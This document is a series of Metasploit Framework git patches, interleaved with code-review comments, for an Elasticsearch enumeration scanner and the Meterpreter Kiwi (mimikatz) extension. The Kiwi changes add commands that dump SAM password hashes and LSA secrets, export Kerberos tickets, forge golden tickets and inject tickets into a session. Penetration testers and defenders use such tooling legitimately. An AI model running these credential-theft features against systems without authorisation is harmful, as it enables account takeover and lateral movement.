res.body, "CouchDB Enum Results") + print_status("Results saved to #{path}") + else + print_error("Failed to save the result") + end + + + rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout + rescue ::Timeout::Error, ::Errno::EPIPE + end + end +end From 975c2adbadf5f4c99d2d23cc4b9982cd107c6550 Mon Sep 17 00:00:00 2001 From: Silas Cutler Date: Mon, 17 Mar 2014 13:34:45 -0400 Subject: [PATCH 064/853] Fixed spaces issues --- modules/auxiliary/scanner/elasticsearch/es_enum.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/auxiliary/scanner/elasticsearch/es_enum.rb b/modules/auxiliary/scanner/elasticsearch/es_enum.rb index ed41a17cc2..a67961323d 100644 
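Review bot: In `run_host` the two trailing `rescue` clauses have empty bodies, so refused connections, unreachable hosts and timeouts vanish without any trace in the scan output. Merging them into `rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Timeout::Error, ::Errno::EPIPE => e` followed by `vprint_error("#{target_host} - #{e.class}: #{e.message}")` keeps the default output quiet while letting an operator see why a host produced nothing. The body is also parsed as JSON before `res.code` is checked, so a non-200 response with a non-JSON body is reported as "Unable to parse JSON" rather than as an unexpected status. The header comment has `http//metasploit.com/download`, which is missing the colon after `http`.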
--- a/modules/auxiliary/scanner/elasticsearch/es_enum.rb +++ b/modules/auxiliary/scanner/elasticsearch/es_enum.rb @@ -23,7 +23,7 @@ class Metasploit3 < Msf::Auxiliary 'License' => MSF_LICENSE ) register_options( - [ + [ Opt::RPORT(9200) ] ) @@ -54,7 +54,7 @@ class Metasploit3 < Msf::Auxiliary if (res.code == 200) temp.each do |index| - print_good("Index : " + index[0]) + print_good("Index : " + index[0]) end end From ad4c3544604ad9716c518393c51a41d9f981c29f Mon Sep 17 00:00:00 2001 From: silascutler Date: Mon, 17 Mar 2014 13:38:33 -0400 Subject: [PATCH 065/853] Update es_enum.rb Corrected changes from dev module --- modules/auxiliary/scanner/elasticsearch/es_enum.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/scanner/elasticsearch/es_enum.rb b/modules/auxiliary/scanner/elasticsearch/es_enum.rb index a67961323d..d74af4984b 100644 --- a/modules/auxiliary/scanner/elasticsearch/es_enum.rb +++ b/modules/auxiliary/scanner/elasticsearch/es_enum.rb @@ -59,7 +59,7 @@ class Metasploit3 < Msf::Auxiliary end if res and res.code == 200 and res.headers['Content-Type'] and res.body.length > 0 - path = store_loot("couchdb.enum.file", "text/plain", rhost, res.body, "CouchDB Enum Results") + path = store_loot("elasticsearch.enum.file", "text/plain", rhost, res.body, "ElasticSearch Enum Results") print_status("Results saved to #{path}") else print_error("Failed to save the result") From 91e198fd636f151af83ee810ae85aba41c6ec4de Mon Sep 17 00:00:00 2001 From: OJ Date: Tue, 18 Mar 2014 09:45:31 +1000 Subject: [PATCH 066/853] Add SAM key dump in LSA dumping output --- .../post/meterpreter/extensions/kiwi/kiwi.rb | 12 ++++++- .../post/meterpreter/extensions/kiwi/tlv.rb | 6 ++++ .../ui/console/command_dispatcher/kiwi.rb | 34 ++++++++++++++----- 3 files changed, 42 insertions(+), 10 deletions(-) diff --git a/lib/rex/post/meterpreter/extensions/kiwi/kiwi.rb b/lib/rex/post/meterpreter/extensions/kiwi/kiwi.rb index e50b6aa728..4c2435cf55 100644 
--- a/lib/rex/post/meterpreter/extensions/kiwi/kiwi.rb +++ b/lib/rex/post/meterpreter/extensions/kiwi/kiwi.rb @@ -55,7 +55,8 @@ class Kiwi < Extension :syskey => to_hex_string(response.get_tlv_value(TLV_TYPE_KIWI_LSA_SYSKEY)), :nt5key => to_hex_string(response.get_tlv_value(TLV_TYPE_KIWI_LSA_NT5KEY)), :nt6keys => [], - :secrets => [] + :secrets => [], + :samkeys => [] } response.each(TLV_TYPE_KIWI_LSA_NT6KEY) do |k| @@ -80,6 +81,15 @@ class Kiwi < Extension result[:secrets] << r end + response.each(TLV_TYPE_KIWI_LSA_SAM) do |s| + result[:samkeys] << { + :rid => s.get_tlv_value(TLV_TYPE_KIWI_LSA_SAM_RID), + :user => s.get_tlv_value(TLV_TYPE_KIWI_LSA_SAM_USER), + :ntlm_hash => to_hex_string(s.get_tlv_value(TLV_TYPE_KIWI_LSA_SAM_NTLMHASH)), + :lm_hash => to_hex_string(s.get_tlv_value(TLV_TYPE_KIWI_LSA_SAM_LMHASH)) + } + end + return result end diff --git a/lib/rex/post/meterpreter/extensions/kiwi/tlv.rb b/lib/rex/post/meterpreter/extensions/kiwi/tlv.rb index 4011729986..0dab0d3d21 100644 --- a/lib/rex/post/meterpreter/extensions/kiwi/tlv.rb +++ b/lib/rex/post/meterpreter/extensions/kiwi/tlv.rb @@ -41,6 +41,12 @@ TLV_TYPE_KIWI_LSA_SECRET_CURR_RAW = TLV_META_TYPE_RAW | (TLV_EXTENSIONS + 30 TLV_TYPE_KIWI_LSA_SECRET_OLD = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 31) TLV_TYPE_KIWI_LSA_SECRET_OLD_RAW = TLV_META_TYPE_RAW | (TLV_EXTENSIONS + 32) +TLV_TYPE_KIWI_LSA_SAM = TLV_META_TYPE_GROUP | (TLV_EXTENSIONS + 33) +TLV_TYPE_KIWI_LSA_SAM_RID = TLV_META_TYPE_UINT | (TLV_EXTENSIONS + 34) +TLV_TYPE_KIWI_LSA_SAM_USER = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 35) +TLV_TYPE_KIWI_LSA_SAM_LMHASH = TLV_META_TYPE_RAW | (TLV_EXTENSIONS + 36) +TLV_TYPE_KIWI_LSA_SAM_NTLMHASH = TLV_META_TYPE_RAW | (TLV_EXTENSIONS + 37) + end end end diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb index 2b6aaa49fd..f5ca784aef 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb 
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb @@ -97,10 +97,11 @@ class Console::CommandDispatcher::Kiwi print_line("NT6 Key Count : #{lsa[:nt6keys].length}") if lsa[:nt6keys].length > 0 - print_line lsa[:nt6keys].to_enum.with_index(1) do |k, i| - print_line("#{i.to_s.rjust(2, ' ')}. ID : #{k[:id]}") - print_line("#{i.to_s.rjust(2, ' ')}. Value : #{k[:value]}") + print_line + index = i.to_s.rjust(2, ' ') + print_line("#{index}. ID : #{k[:id]}") + print_line("#{index}. Value : #{k[:value]}") end end @@ -108,14 +109,29 @@ class Console::CommandDispatcher::Kiwi print_line("Secret Count : #{lsa[:secrets].length}") if lsa[:secrets].length > 0 lsa[:secrets].to_enum.with_index(1) do |s, i| - print_line - print_line("#{i.to_s.rjust(2, ' ')}. Name : #{s[:name]}") - print_line("#{i.to_s.rjust(2, ' ')}. Service : #{s[:service]}") if s[:service] - print_line("#{i.to_s.rjust(2, ' ')}. NTLM : #{s[:ntlm]}") if s[:ntlm] - print_line("#{i.to_s.rjust(2, ' ')}. Current : #{s[:current]}") if s[:current] - print_line("#{i.to_s.rjust(2, ' ')}. Old : #{s[:old]}") if s[:old] + print_line + index = i.to_s.rjust(2, ' ') + print_line("#{index}. Name : #{s[:name]}") + print_line("#{index}. Service : #{s[:service]}") if s[:service] + print_line("#{index}. NTLM : #{s[:ntlm]}") if s[:ntlm] + print_line("#{index}. Current : #{s[:current]}") if s[:current] + print_line("#{index}. Old : #{s[:old]}") if s[:old] end end + + print_line + print_line("SAM Key Count : #{lsa[:samkeys].length}") + if lsa[:samkeys].length > 0 + lsa[:samkeys].to_enum.with_index(1) do |s, i| + print_line + index = i.to_s.rjust(2, ' ') + print_line("#{index}. RID : #{s[:rid]}") + print_line("#{index}. User : #{s[:user]}") + print_line("#{index}. LM Hash : #{s[:lm_hash]}") if s[:lm_hash] + print_line("#{index}. NTLM Hash : #{s[:ntlm_hash]}") if s[:ntlm_hash] + end + end + print_line end From d36159710409c6d07e312f0980f506845662d5f4 Mon Sep 17 00:00:00 2001 
From: silascutler Date: Tue, 18 Mar 2014 09:20:04 -0400 Subject: [PATCH 067/853] Update es_enum.rb --- .../scanner/elasticsearch/es_enum.rb | 48 +++++++------------ 1 file changed, 18 insertions(+), 30 deletions(-) diff --git a/modules/auxiliary/scanner/elasticsearch/es_enum.rb b/modules/auxiliary/scanner/elasticsearch/es_enum.rb index d74af4984b..a44eea1cee 100644 --- a/modules/auxiliary/scanner/elasticsearch/es_enum.rb +++ b/modules/auxiliary/scanner/elasticsearch/es_enum.rb @@ -3,35 +3,32 @@ # Current source: https://github.com/rapid7/metasploit-framework ## - require 'msf/core' - class Metasploit3 < Msf::Auxiliary - # Exploit mixins should be called first include Msf::Exploit::Remote::HttpClient - # Scanner mixin should be near last include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report - def initialize - super( - 'Name' => 'ElasticSearch Enum Utility', - 'Description' => 'Send a request to enumerate ElasticSearch indices', - 'Author' => ['Silas Cutler MSF_LICENSE - ) + def initialize(info = {}) + super(update_info(info, + 'Name' => 'ElasticSearch Enum Utility', + 'Description' => %q{ Send a request to enumerate ElasticSearch indices}, + 'Author' => + [ + 'Silas Cutler ' + ], + 'License' => MSF_LICENSE + )) + register_options( [ Opt::RPORT(9200) - ] - ) - + ], self.class) end - def run_host(target_host) - + def run_host(ip) begin res = send_request_raw({ 'uri' => '/_aliases', 
@@ -39,33 +36,24 @@ class Metasploit3 < Msf::Auxiliary 'version' => '1.0', }, 10) - if res.nil? - print_error("No response for #{target_host}") - return nil - end - begin - temp = JSON.parse(res.body) + json_body = JSON.parse(res.body) rescue JSON::ParserError print_error("Unable to parse JSON") return end - - if (res.code == 200) - temp.each do |index| + if res and res.code == 200 and res.body.length > 0 + json_body.each do |index| print_good("Index : " + index[0]) end - end - if res and res.code == 200 and res.headers['Content-Type'] and res.body.length > 0 - path = store_loot("elasticsearch.enum.file", "text/plain", rhost, res.body, "ElasticSearch Enum Results") - print_status("Results saved to #{path}") + path = store_loot("elasticsearch.enum.file", "text/plain", ip, res.body, "ElasticSearch Enum Results") + print_good("Results saved to #{path}") else print_error("Failed to save the result") end - rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout rescue ::Timeout::Error, ::Errno::EPIPE end From 3635fff98e3e62f6c4051918fa2c77d5f871dd31 Mon Sep 17 00:00:00 2001 From: OJ Date: Wed, 19 Mar 2014 14:25:11 +1000 Subject: [PATCH 068/853] Add support for kerberos ticket enumeration Fix up a bunch of other issues and do some code tidies too. --- .../post/meterpreter/extensions/kiwi/kiwi.rb | 74 +++++++++- .../post/meterpreter/extensions/kiwi/tlv.rb | 14 +- .../ui/console/command_dispatcher/kiwi.rb | 127 +++++++++++++++--- 3 files changed, 193 insertions(+), 22 deletions(-) diff --git a/lib/rex/post/meterpreter/extensions/kiwi/kiwi.rb b/lib/rex/post/meterpreter/extensions/kiwi/kiwi.rb index 4c2435cf55..b19cc0278a 100644 --- a/lib/rex/post/meterpreter/extensions/kiwi/kiwi.rb +++ b/lib/rex/post/meterpreter/extensions/kiwi/kiwi.rb 
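Review bot: `JSON.parse(res.body)` now runs without the `res.nil?` guard that this hunk removes, so when `send_request_raw` returns nil (the case the removed "No response" branch handled) the call raises NoMethodError. Neither `rescue JSON::ParserError` nor the connection rescues at the end of the method catch that error. The later `if res and res.code == 200` test comes too late to help, because the parse has already dereferenced `res`. Restoring the removed guard ahead of the parse with the renamed parameter would fix it: `if res.nil?`, then `print_error("No response for #{ip}")` and `return`. `run_host` begins in the previous hunk, so this is based on the lines visible here.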
@@ -93,15 +93,79 @@ class Kiwi < Extension return result end - def golden_ticket_use(ticket) - request = Packet.create_request('kiwi_golden_ticket_use') - request.add_tlv(TLV_TYPE_KIWI_GOLD_TICKET, ticket, false, true) + @@kerberos_flags = [ + "NAME CANONICALIZE", + "", + "OK AS DELEGATE", + "", + "HW AUTHENT", + "PRE AUTHENT", + "INITIAL", + "RENEWABLE", + "INVALID", + "POSTDATED", + "MAY POSTDATE", + "PROXY", + "PROXIABLE", + "FORWARDED", + "FORWARDABLE", + "RESERVED" + ] + def to_kerberos_flag_list(flags) + flags = flags >> 16 + results = [] + + @@kerberos_flags.each_with_index do |item, idx| + mask = 1 << idx + + if (flags & (1 << idx)) != 0 + results << item + end + end + + return results + end + + def kerberos_ticket_list(export) + export ||= false + request = Packet.create_request('kiwi_kerberos_ticket_list') + request.add_tlv(TLV_TYPE_KIWI_KERB_EXPORT, export) + response = client.send_request(request) + + results = [] + + response.each(TLV_TYPE_KIWI_KERB_TKT) do |t| + results << { + :enc_type => t.get_tlv_value(TLV_TYPE_KIWI_KERB_TKT_ENCTYPE), + :start => t.get_tlv_value(TLV_TYPE_KIWI_KERB_TKT_START), + :end => t.get_tlv_value(TLV_TYPE_KIWI_KERB_TKT_END), + :max_renew => t.get_tlv_value(TLV_TYPE_KIWI_KERB_TKT_MAXRENEW), + :server => t.get_tlv_value(TLV_TYPE_KIWI_KERB_TKT_SERVERNAME), + :server_realm => t.get_tlv_value(TLV_TYPE_KIWI_KERB_TKT_SERVERREALM), + :client => t.get_tlv_value(TLV_TYPE_KIWI_KERB_TKT_CLIENTNAME), + :client_realm => t.get_tlv_value(TLV_TYPE_KIWI_KERB_TKT_CLIENTREALM), + :flags => t.get_tlv_value(TLV_TYPE_KIWI_KERB_TKT_FLAGS), + :raw => t.get_tlv_value(TLV_TYPE_KIWI_KERB_TKT_RAW) + } + end + + return results + end + + def kerberos_ticket_use(ticket) + request = Packet.create_request('kiwi_kerberos_ticket_use') + request.add_tlv(TLV_TYPE_KIWI_KERB_TKT_RAW, ticket, false, true) + client.send_request(request) + end + + def kerberos_ticket_purge + request = Packet.create_request('kiwi_kerberos_ticket_purge') client.send_request(request) end 
def golden_ticket_create(user, domain, sid, tgt) - request = Packet.create_request('kiwi_golden_ticket_create') + request = Packet.create_request('kiwi_kerberos_golden_ticket_create') request.add_tlv(TLV_TYPE_KIWI_GOLD_USER, user) request.add_tlv(TLV_TYPE_KIWI_GOLD_DOMAIN, domain) request.add_tlv(TLV_TYPE_KIWI_GOLD_SID, sid) @@ -109,7 +173,7 @@ class Kiwi < Extension response = client.send_request(request) - return response.get_tlv_value(TLV_TYPE_KIWI_GOLD_TICKET) + return response.get_tlv_value(TLV_TYPE_KIWI_KERB_TKT_RAW) end def scrape_passwords(pwd_id) diff --git a/lib/rex/post/meterpreter/extensions/kiwi/tlv.rb b/lib/rex/post/meterpreter/extensions/kiwi/tlv.rb index 0dab0d3d21..ed40d8f99e 100644 --- a/lib/rex/post/meterpreter/extensions/kiwi/tlv.rb +++ b/lib/rex/post/meterpreter/extensions/kiwi/tlv.rb @@ -19,7 +19,6 @@ TLV_TYPE_KIWI_GOLD_USER = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 10 TLV_TYPE_KIWI_GOLD_DOMAIN = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 11) TLV_TYPE_KIWI_GOLD_SID = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 12) TLV_TYPE_KIWI_GOLD_TGT = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 13) -TLV_TYPE_KIWI_GOLD_TICKET = TLV_META_TYPE_RAW | (TLV_EXTENSIONS + 14) TLV_TYPE_KIWI_LSA_VER_MAJ = TLV_META_TYPE_UINT | (TLV_EXTENSIONS + 15) TLV_TYPE_KIWI_LSA_VER_MIN = TLV_META_TYPE_UINT | (TLV_EXTENSIONS + 16) 
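Review bot: In `to_kerberos_flag_list` (hunk `@@ -93,15 +93,79 @@`) the local `mask = 1 << idx` is assigned and never used, because the test on the next line recomputes `1 << idx`. The two empty placeholder names in `@@kerberos_flags` are also appended to `results` whenever their bits are set, so the joined flag string shown by the console command can contain blank entries. The loop body could be `results << item if (flags & mask) != 0 && !item.empty?`. In `kerberos_ticket_list`, `export ||= false` only changes a nil argument, so a default in the signature (`def kerberos_ticket_list(export = false)`) would state the intent more directly.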
@@ -47,6 +46,19 @@ TLV_TYPE_KIWI_LSA_SAM_USER = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 35 TLV_TYPE_KIWI_LSA_SAM_LMHASH = TLV_META_TYPE_RAW | (TLV_EXTENSIONS + 36) TLV_TYPE_KIWI_LSA_SAM_NTLMHASH = TLV_META_TYPE_RAW | (TLV_EXTENSIONS + 37) +TLV_TYPE_KIWI_KERB_EXPORT = TLV_META_TYPE_BOOL | (TLV_EXTENSIONS + 38) +TLV_TYPE_KIWI_KERB_TKT = TLV_META_TYPE_GROUP | (TLV_EXTENSIONS + 39) +TLV_TYPE_KIWI_KERB_TKT_ENCTYPE = TLV_META_TYPE_UINT | (TLV_EXTENSIONS + 40) +TLV_TYPE_KIWI_KERB_TKT_START = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 41) +TLV_TYPE_KIWI_KERB_TKT_END = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 42) +TLV_TYPE_KIWI_KERB_TKT_MAXRENEW = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 43) +TLV_TYPE_KIWI_KERB_TKT_SERVERNAME = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 44) +TLV_TYPE_KIWI_KERB_TKT_SERVERREALM = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 45) +TLV_TYPE_KIWI_KERB_TKT_CLIENTNAME = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 46) +TLV_TYPE_KIWI_KERB_TKT_CLIENTREALM = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 47) +TLV_TYPE_KIWI_KERB_TKT_FLAGS = TLV_META_TYPE_UINT | (TLV_EXTENSIONS + 48) +TLV_TYPE_KIWI_KERB_TKT_RAW = TLV_META_TYPE_RAW | (TLV_EXTENSIONS + 49) + end end end diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb index f5ca784aef..8972d0aeb2 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb 
@@ -26,7 +26,18 @@ class Console::CommandDispatcher::Kiwi # def initialize(shell) super + print_line + print_line + print_line(" .#####. mimikatz 2.0 alpha (#{client.platform}) release \"Kiwi en C\"") + print_line(" .## ^ ##.") + print_line(" ## / \\ ## /* * *") + print_line(" ## \\ / ## Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )") + print_line(" '## v ##' http://blog.gentilkiwi.com/mimikatz (oe.eo)") + print_line(" '#####' Ported to Metasploit by OJ Reeves `TheColonial` * * */") + print_line + if (client.platform =~ /x86/) and (client.sys.config.sysinfo['Architecture'] =~ /x64/) + print_line print_warning "Loaded x86 Kiwi on an x64 architecture." end 
@@ -37,16 +48,18 @@ class Console::CommandDispatcher::Kiwi # def commands { - "creds_wdigest" => "Attempt to retrieve WDigest creds", - "creds_msv" => "Attempt to retrieve LM/NTLM creds (hashes)", - "creds_livessp" => "Attempt to retrieve LiveSSP creds", - "creds_ssp" => "Attempt to retrieve SSP creds", - "creds_tspkg" => "Attempt to retrieve TsPkg creds", - "creds_kerberos" => "Attempt to retrieve Kerberos creds", - "creds_all" => "Attempt to retrieve all credentials", - "golden_ticket_create" => "Attempt to create a golden kerberos ticket", - "golden_ticket_use" => "Attempt to use a golden kerberos ticket", - "lsa_dump" => "Attempt to dump LSA secrets" + "creds_wdigest" => "Attempt to retrieve WDigest creds", + "creds_msv" => "Attempt to retrieve LM/NTLM creds (hashes)", + "creds_livessp" => "Attempt to retrieve LiveSSP creds", + "creds_ssp" => "Attempt to retrieve SSP creds", + "creds_tspkg" => "Attempt to retrieve TsPkg creds", + "creds_kerberos" => "Attempt to retrieve Kerberos creds", + "creds_all" => "Attempt to retrieve all credentials", + "golden_ticket_create" => "Attempt to create a golden kerberos ticket", + "kerberos_ticket_use" => "Attempt to use a kerberos ticket", + "kerberos_ticket_purge" => "Attempt to purege any in-use kerberos tickets", + "kerberos_ticket_list" => "Attempt to list all kerberos tickets", + "lsa_dump" => "Attempt to dump LSA secrets" } end 
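Review bot: The help text added for `kerberos_ticket_purge` in the `commands` hash is misspelled as "purege". This string is shown to the user in the command listing, so it should read `"kerberos_ticket_purge" => "Attempt to purge any in-use kerberos tickets",`.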
@@ -150,12 +163,94 @@ class Console::CommandDispatcher::Kiwi ::File.open( target, 'wb' ) do |f| f.write ticket end - print_good("Golden ticket written to #{target}") + print_good("Golden Kerberos ticket written to #{target}") end - def cmd_golden_ticket_use(*args) + @@kerberos_ticket_list_opts = Rex::Parser::Arguments.new( + "-h" => [ false, "Help banner" ], + "-e" => [ false, "Export Kerberos tickets to disk" ], + "-p" => [ true, "Path to export Kerberos tickets to" ] + ) + + def kerberos_ticket_list_usage + print( + "\nUsage: kerberos_ticket_list [-h] [-e ] [-p ]\n\n" + + "List all the available Kerberos tickets.\n\n" + + @@kerberos_ticket_list_opts.usage) + end + + def cmd_kerberos_ticket_list(*args) + if args.include?("-h") + kerberos_ticket_list_usage + return true + end + + export = false + export_path = "." + + @@kerberos_ticket_list_opts.parse(args) { |opt, idx, val| + case opt + when "-e" + export = true + when "-p" + export_path = val + end + } + + tickets = client.kiwi.kerberos_ticket_list(export) + + fields = ['Server', 'Client', 'Start', 'End', 'Max Renew', 'Flags'] + fields << 'Export Path' if export + + table = Rex::Ui::Text::Table.new( + 'Header' => "Kerberos Tickets", + 'Indent' => 0, + 'SortIndex' => 0, + 'Columns' => fields + ) + + tickets.each do |t| + flag_list = client.kiwi.to_kerberos_flag_list(t[:flags]).join(", ") + values = [ + "#{t[:server]} @ #{t[:server_realm]}", + "#{t[:client]} @ #{t[:client_realm]}", + t[:start], + t[:end], + t[:max_renew], + "#{t[:flags].to_s(16).rjust(8, '0')} (#{flag_list})" + ] + + if export + path = "" + if t[:raw] + id = "#{values[0]}-#{values[1]}".gsub(/[\\\/\$ ]/, '-') + file = "kerb-#{id}-#{Rex::Text.rand_text_alpha(8)}.tkt" + path = ::File.expand_path(File.join(export_path, file)) + ::File.open(path, 'wb') do |x| + x.write t[:raw] + end + end + values << path + end + + table << values + end + + print_line + print_line(table.to_s) + print_line("Total Tickets : #{tickets.length}") + + return true + end + + 
def cmd_kerberos_ticket_purge(*args) + client.kiwi.keberos_ticket_purge + print_good("Kerberos tickets purged") + end + + def cmd_kerberos_ticket_use(*args) if args.length != 1 - print_line("Usage: golden_ticket_use ticketpath") + print_line("Usage: kerberos_ticket_use ticketpath") return end @@ -164,9 +259,9 @@ class Console::CommandDispatcher::Kiwi ::File.open(target, 'rb') do |f| ticket += f.read(f.stat.size) end - print_status("Using ticket stored in #{target}, #{ticket.length} bytes") - client.kiwi.golden_ticket_use(ticket) - print_good("Ticket applied successfully") + print_status("Using Kerberos ticket stored in #{target}, #{ticket.length} bytes") + client.kiwi.kerberos_ticket_use(ticket) + print_good("Kerberos ticket applied successfully") end def cmd_creds_all(*args) From 0dcf9927818005f89c4d2611ffcb3c13809d8a7c Mon Sep 17 00:00:00 2001 From: OJ Date: Wed, 19 Mar 2014 15:45:53 +1000 Subject: [PATCH 069/853] Add comments to the kiwi source --- .../post/meterpreter/extensions/kiwi/kiwi.rb | 159 +++++++++++++++--- .../ui/console/command_dispatcher/kiwi.rb | 124 ++++++++++---- 2 files changed, 230 insertions(+), 53 deletions(-) diff --git a/lib/rex/post/meterpreter/extensions/kiwi/kiwi.rb b/lib/rex/post/meterpreter/extensions/kiwi/kiwi.rb index b19cc0278a..20cf637984 100644 --- a/lib/rex/post/meterpreter/extensions/kiwi/kiwi.rb +++ b/lib/rex/post/meterpreter/extensions/kiwi/kiwi.rb @@ -21,6 +21,10 @@ module Kiwi class Kiwi < Extension + # + # These are constants that identify the type of credential to dump + # from the target machine. + # PWD_ID_SEK_ALLPASS = 0 PWD_ID_SEK_WDIGEST = 1 PWD_ID_SEK_MSV = 2 
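Review bot: `cmd_kerberos_ticket_purge` calls `client.kiwi.keberos_ticket_purge`, which is misspelled; the extension method shown elsewhere on this page is `kerberos_ticket_purge`, so the command would presumably fail with a NoMethodError instead of sending the request. The line should read `client.kiwi.kerberos_ticket_purge`, and the misspelled call is still present as context in the later hunks that touch this method. In `cmd_kerberos_ticket_list`, the export file name is built from server and client names reported by the remote host and cleaned only with the denylist `/[\\\/\$ ]/`; an allowlist such as `.gsub(/[^A-Za-z0-9_.@-]/, '-')` is the safer choice for remote-supplied text that becomes part of a local path. The exported files hold ticket material, so creating them owner-only with `::File.open(path, 'wb', 0600)` avoids leaving them readable under a permissive umask; the same applies to the ticket file written by `cmd_golden_ticket_create` in this hunk's context.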
@@ -31,6 +35,33 @@ class Kiwi < Extension PWD_ID_SEK_TICKETS = 7 PWD_ID_SEK_DPAPI = 8 + # + # List of names which represent the flags that are part of the + # dumped kerberos tickets. The order of these is important. Each + # of them was pulled from the Mimikatz 2.0 source base. + # + @@kerberos_flags = [ + "NAME CANONICALIZE", + "", + "OK AS DELEGATE", + "", + "HW AUTHENT", + "PRE AUTHENT", + "INITIAL", + "RENEWABLE", + "INVALID", + "POSTDATED", + "MAY POSTDATE", + "PROXY", + "PROXIABLE", + "FORWARDED", + "FORWARDABLE", + "RESERVED" + ] + + # + # Typical extension initialization routine. + # def initialize(client) super(client, 'kiwi') @@ -43,6 +74,11 @@ class Kiwi < Extension ]) end + # + # Dump the LSA secrets from the target machine. + # + # Returns [Array[Hash]] + # def lsa_dump request = Packet.create_request('kiwi_lsa_dump_secrets') @@ -93,25 +129,14 @@ class Kiwi < Extension return result end - @@kerberos_flags = [ - "NAME CANONICALIZE", - "", - "OK AS DELEGATE", - "", - "HW AUTHENT", - "PRE AUTHENT", - "INITIAL", - "RENEWABLE", - "INVALID", - "POSTDATED", - "MAY POSTDATE", - "PROXY", - "PROXIABLE", - "FORWARDED", - "FORWARDABLE", - "RESERVED" - ] - + # + # Convert a flag set to a list of string representations for the bit flags + # that are set. + # + # +flags+ [Integer] - Integer bitmask of Kerberos token flags. + # + # Returns [String] + # def to_kerberos_flag_list(flags) flags = flags >> 16 results = [] @@ -127,6 +152,13 @@ class Kiwi < Extension return results end + # + # List available kerberos tickets. + # + # +export+ [Bool] - Set to +true+ to export the content of each ticket + # + # Returns [Array[Hash]] + # def kerberos_ticket_list(export) export ||= false request = Packet.create_request('kiwi_kerberos_ticket_list') 
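Review bot: The comment added above `to_kerberos_flag_list` documents `Returns [String]`, but the method starts with `results = []` and the next hunk's context shows `return results`, so callers receive an array of flag names. The line should be `# Returns [Array[String]]`. Most of the method body lies outside this hunk, so how the names are picked from `@@kerberos_flags` is not visible here.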
@@ -153,17 +185,41 @@ class Kiwi < Extension return results end + # + # Use the given ticket in the current session. + # + # +ticket+ [Array[Byte]] - Content of the Kerberos ticket to use. + # + # Returns [Bool] + # def kerberos_ticket_use(ticket) request = Packet.create_request('kiwi_kerberos_ticket_use') request.add_tlv(TLV_TYPE_KIWI_KERB_TKT_RAW, ticket, false, true) client.send_request(request) + return true end + # + # Purge any Kerberos tickets that have been added to the current session. + # + # Returns [Bool] + # def kerberos_ticket_purge request = Packet.create_request('kiwi_kerberos_ticket_purge') client.send_request(request) + return true end + # + # Create a new golden kerberos ticket on the target machine and return it. + # + # +user+ [String] - Name of the user to create the ticket for. + # +domain+ [String] - Domain name. + # +sid+ [String] - SID of the domain. + # +tgt+ [String] - The kerberos ticket granting token. + # + # Returns [Array[Byte]] + # def golden_ticket_create(user, domain, sid, tgt) request = Packet.create_request('kiwi_kerberos_golden_ticket_create') request.add_tlv(TLV_TYPE_KIWI_GOLD_USER, user) @@ -176,6 +232,13 @@ class Kiwi < Extension return response.get_tlv_value(TLV_TYPE_KIWI_KERB_TKT_RAW) end + # + # Scrape passwords from the target machine. + # + # +pwd_id+ - ID of the type credential to scrape. + # + # Returns [Array[Hash]] + # def scrape_passwords(pwd_id) request = Packet.create_request('kiwi_scrape_passwords') request.add_tlv(TLV_TYPE_KIWI_PWD_ID, pwd_id) 
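Review bot: The `return true` added to `kerberos_ticket_use` and `kerberos_ticket_purge` makes the documented `Returns [Bool]` carry no information, because the result of `client.send_request(request)` is discarded and nothing in either body can yield false. If a failed request is reported by `send_request` raising (not visible here), say so in the comment, e.g. `# Returns true; a failed request is expected to raise`; otherwise keep the response and derive the return value from it. `+ticket+` is also documented as `[Array[Byte]]`, while the console command passes the String it read from the ticket file, so `[String]` would match the caller.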
@@ -197,36 +260,79 @@ class Kiwi < Extension return results end + # + # Scrape all passwords from the target machine. + # + # Returns [Array[Hash]] + # def all_pass return scrape_passwords(PWD_ID_SEK_ALLPASS) end + # + # Scrape wdigest credentials from the target machine. + # + # Returns [Array[Hash]] + # def wdigest return scrape_passwords(PWD_ID_SEK_WDIGEST) end + # + # Scrape msv credentials from the target machine. + # + # Returns [Array[Hash]] + # def msv return scrape_passwords(PWD_ID_SEK_MSV) end + # + # Scrape LiveSSP credentials from the target machine. + # + # Returns [Array[Hash]] + # def livessp return scrape_passwords(PWD_ID_SEK_LIVESSP) end + # + # Scrape SSP credentials from the target machine. + # + # Returns [Array[Hash]] + # def ssp return scrape_passwords(PWD_ID_SEK_SSP) end + # + # Scrape TSPKG credentials from the target machine. + # + # Returns [Array[Hash]] + # def tspkg return scrape_passwords(PWD_ID_SEK_TSPKG) end + # + # Scrape Kerberos credentials from the target machine. + # + # Returns [Array[Hash]] + # def kerberos return scrape_passwords(PWD_ID_SEK_KERBEROS) end protected + # + # Convert an array of bytes to a string-based hex dump in the format + # AA BB CC DD EE FF + # + # +bytes+ 